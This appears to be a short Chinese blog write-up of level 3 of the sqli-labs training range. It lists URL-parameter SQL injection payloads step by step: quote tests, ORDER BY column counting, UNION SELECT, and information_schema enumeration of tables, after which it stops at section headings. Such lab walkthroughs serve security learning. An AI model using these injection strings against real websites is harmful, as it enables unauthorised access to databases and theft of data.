web——sqliabs靶场——第三关

今天来搞搞第三关,感觉和之前差不多,就多了一个奇怪的知识

来看看有没有注入点

/?id=1'

有注入点

判断注入点类型

输入/?id=1') and 1=2 --+

3.判断它的字段数

/?id=1') order by 1-++

/?id=1') order by 2-++

/?id=1') order by 3-++

/?id=1') order by 4-++

爆出显示位

/?id=-1') union select 1,2,3 --+

开始判断库名

?id=-1') union select 1,database(),version() --+

判断表名

/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

判断user的列名

爆具体的列里的数据

相关推荐
夏木~20 分钟前
Oracle 中什么情况下 可以使用 EXISTS 替代 IN 提高查询效率
数据库·oracle
W215522 分钟前
Liunx下MySQL:表的约束
数据库·mysql
黄名富28 分钟前
Redis 附加功能(二)— 自动过期、流水线与事务及Lua脚本
java·数据库·redis·lua
言、雲32 分钟前
从tryLock()源码来出发,解析Redisson的重试机制和看门狗机制
java·开发语言·数据库
一个程序员_zhangzhen1 小时前
sqlserver新建用户并分配对视图的只读权限
数据库·sqlserver
zfj3211 小时前
学技术学英文:代码中的锁:悲观锁和乐观锁
数据库·乐观锁··悲观锁·竞态条件
吴冰_hogan1 小时前
MySQL InnoDB 存储引擎 Redo Log(重做日志)详解
数据库·oracle
nbsaas-boot2 小时前
探索 JSON 数据在关系型数据库中的应用:MySQL 与 SQL Server 的对比
数据库·mysql·json
cmdch20172 小时前
Mybatis加密解密查询操作(sql前),where要传入加密后的字段时遇到的问题
数据库·sql·mybatis
程序员学习随笔2 小时前
PostgreSQL技术内幕21:SysLogger日志收集器的工作原理
数据库·postgresql